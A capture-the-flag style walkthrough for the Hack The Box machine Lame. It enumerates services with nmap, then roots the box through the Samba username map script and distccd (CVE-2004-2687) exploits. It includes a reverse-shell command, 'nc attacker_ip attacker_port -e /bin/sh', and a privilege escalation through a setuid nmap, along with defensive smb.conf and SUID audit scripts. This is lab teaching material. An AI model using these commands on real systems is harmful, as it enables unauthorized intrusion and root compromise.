HTB Lame - NO Metasploit Walkthrough

DEV Community
Michael Oladele

In this walkthrough, we are going to explore two ways to root Lame without Metasploit. If you are ready, let's dive in. We start with an nmap scan as usual:

```
nmap -p- 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:30 CDT
Nmap scan report for 10.129.22.59
Host is up (0.070s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd
```

I usually scan all ports first, then check each service individually. We follow the same flow here. We got FTP, SSH, SMB and distccd; let's look into these services one at a time:

```
nmap -A -p21 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:34 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.15.162
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Arris TG862G/CT cable modem (90%), Control4 HC-300 home controller (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.27 (90%), Linux 2.4.7 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Unix

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   70.36 ms 10.10.14.1
2   70.76 ms 10.129.22.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.36 seconds
```

From our scan, "Anonymous FTP login allowed (FTP code 230)" sounds promising. Let's try to log in. We can log in, but there is nothing of interest in there:

```
ftp 10.129.22.59
Connected to 10.129.22.59.
220 (vsFTPd 2.3.4)
Name (10.129.22.59:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||53820|).
150 Here comes the directory listing.
226 Directory send OK.
```

When we check the FTP version, though, vsftpd 2.3.4 is the release affected by the VSFTPD 2.3.4 Backdoor Command Execution issue. Because we do not want to use Metasploit, let's check the other services first:

```
nmap -A -p22 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:39 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (91%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Arris TG862G/CT cable modem (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.27 (90%), Linux 2.4.7 (90%), Linux 2.6.27 - 2.6.28 (90%), Linux 2.6.8 - 2.6.30 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   70.14 ms 10.10.14.1
2   70.53 ms 10.129.22.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.82 seconds
```

Nothing stands out on SSH. Let's move to SMB; for SMB we combine ports 139 and 445:

```
nmap -A -p139,445 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:42 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%), Linux 2.6.18 (ClarkConnect 4.3 Enterprise Edition) (90%), Linux 2.6.8 - 2.6.30 (90%), Dell iDRAC 6 remote access controller (Linux 2.6) (90%), Linksys WRV54G WAP (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2026-04-20T16:43:38-04:00
|_clock-skew: mean: 2h00m39s, deviation: 2h49m44s, median: 37s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   70.41 ms 10.10.14.1
2   70.59 ms 10.129.22.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.91 seconds
```

The SMB/Samba version discovered is smbd 3.0.20-Debian. Let's try to access the shares with smbclient:

```
smbclient //10.129.22.59/anonymous
Password for [WORKGROUP\iamdayone]:
Anonymous login successful
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
```

It shows "Anonymous login successful", so let's list the shares:

```
smbclient -L \\\\10.129.22.59\\
Password for [WORKGROUP\iamdayone]:
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME
```

I was able to list the shares, but I was unable to access any of them.
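From the defender's side, the three things this enumeration surfaced (anonymous/guest login succeeding, SMB signing disabled, and a Samba 3.0.20 build whose `username map script` directive is the well-known weakness) can all be read straight out of smb.conf. The following Python audit is an added example, not code from the original post; the sample configuration it parses is constructed, and the map script path in it is made up.

```python
import configparser
from io import StringIO

# Constructed sample smb.conf resembling the weaknesses enumerated above.
# This is not the box's real configuration; the script path is made up.
WEAK_SMB_CONF = """
[global]
workgroup = WORKGROUP
server string = lame server
security = user
map to guest = Bad User
username map script = /etc/samba/mapscript.sh
server signing = disabled

[tmp]
path = /tmp
guest ok = yes
writable = yes
"""

def audit_smb_conf(text):
    """Return a list of findings for an smb.conf given as a string.

    Checks mirror what enumeration of this host surfaced: a `username map
    script` directive (the Samba 3.0.20 weakness), SMB signing not enforced,
    guest mapping enabled, and shares that allow anonymous access.
    """
    # smb.conf is INI-like; disable interpolation so %U-style macros survive.
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_file(StringIO(text))
    findings = []
    g = cp["global"] if cp.has_section("global") else {}
    if "username map script" in g:
        findings.append("global: 'username map script' is set; remove it and upgrade Samba")
    signing = g.get("server signing", "(unset)").strip().lower()
    if signing != "mandatory":
        findings.append(f"global: server signing = {signing}; set it to mandatory")
    if g.get("map to guest", "Never").strip().lower() != "never":
        findings.append("global: 'map to guest' allows guest mapping; set it to Never")
    for share in cp.sections():
        if share == "global":
            continue
        if cp[share].get("guest ok", "no").strip().lower() in ("yes", "true", "1"):
            findings.append(f"[{share}]: guest ok = yes; anonymous users can reach this share")
    return findings
```

Run it against `/etc/samba/smb.conf` on a host you administer; an empty list means none of the four conditions above is present.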
Now let's search for that version to see whether it has any known vulnerability. We find that Samba 3.0.20 is vulnerable through its username map script, and because I do not want to use Metasploit, I used the exploit here. With that exploit we got a root shell directly, so there is no need for privilege escalation. Remember that we still have one more service left; let's see if we can compromise that as well without Metasploit, why not:

```
nmap -A -p3632 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:45 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).

PORT     STATE SERVICE VERSION
3632/tcp open  distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (90%), Control4 HC-300 home controller (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%), Citrix XenServer 5.5 (Linux 2.6.18) (90%), Linux 2.6.18 (ClarkConnect 4.3 Enterprise Edition) (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 3632/tcp)
HOP RTT      ADDRESS
1   70.75 ms 10.10.14.1
2   71.01 ms 10.129.22.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds
```

The service version running is distccd v1; let's check if it is vulnerable. After some googling, we discovered that this version is vulnerable to distccd v1 RCE (CVE-2004-2687). Remember, we do not want to use Metasploit.
After several searches, I found this exploit, which would not work: exploit. I ported the exploit code to Python 3 to see if it would work: upgraded exploit here. Once you have the exploit ready, start a netcat listener on your local machine:

```
nc -lvnp attacker_port
```

Then run the exploit with the command below:

```
python3 exploit.py -t target_ip -p target_port -c "nc attacker_ip attacker_port -e /bin/sh"
```

I popped a shell. If you noticed, with this shell, unlike the Samba shell, we are not root. Therefore, we need to escalate our privileges. First, let's check SUID binaries to see if there is one we can ride on to become root:

```
find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
```

From the output above, /usr/bin/nmap looks juicy. Let's check GTFOBins. We found nmap on GTFOBins, along with the command to run, so what are we waiting for? Let's run the command. We are root!

This machine reinforced the importance of approaching exploitation from multiple angles. While distccd (CVE-2004-2687) provided a straightforward remote code execution path, exploring the Samba service revealed an alternative route to compromise. This highlights that real-world targets often have more than one viable attack vector. Avoiding automated tools like Metasploit forced a deeper understanding of the underlying vulnerabilities.
Rewriting the exploits improved my ability to analyze exploit logic, adapt payloads, and troubleshoot issues when things didn’t work as expected. Another key takeaway is the critical role of thorough enumeration. Identifying outdated and vulnerable services early on made exploitation significantly easier. This emphasizes that enumeration is often the most important phase of a penetration test. Finally, this machine demonstrates how legacy services such as distccd and Samba can pose serious security risks when left unpatched, reinforcing the importance of proper system hardening and regular updates.
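The hardening point above has a concrete counterpart for the privilege-escalation step: a setuid nmap should never have survived a baseline check. The Python below is an added example, not code from the original post; it reproduces the `find / -perm -u=s -type f` walk and diffs the result against a baseline of setuid binaries expected on a stock Debian/Ubuntu host (that baseline is an assumption for illustration, and the sample list is a constructed subset of the output above).

```python
import os
import stat

# Constructed sample: a subset of the `find / -perm -u=s -type f` output above.
SAMPLE_SUID = [
    "/bin/su", "/bin/mount", "/bin/ping", "/usr/bin/passwd",
    "/usr/bin/sudo", "/usr/bin/nmap", "/usr/bin/mtr", "/usr/bin/at",
]

# Baseline of setuid binaries expected on a stock Debian/Ubuntu host.
# Assumption for illustration; build yours from a known-good image.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/sudoedit", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/lib/openssh/ssh-keysign",
}

SKIP_DIRS = {"/proc", "/sys", "/dev"}

def find_suid_files(root="/"):
    """Walk `root` and return regular files with the setuid bit set,
    the same set that `find / -perm -u=s -type f` reports."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune pseudo-filesystems so the walk stays fast and quiet.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found

def unexpected_suid(paths, baseline=EXPECTED_SUID):
    """Return setuid files not in the baseline, sorted. Each one needs a
    written justification or `chmod u-s`; nmap on this box is the obvious case."""
    return sorted(set(paths) - set(baseline))

if __name__ == "__main__":
    for path in unexpected_suid(find_suid_files()):
        print("review setuid binary:", path)
```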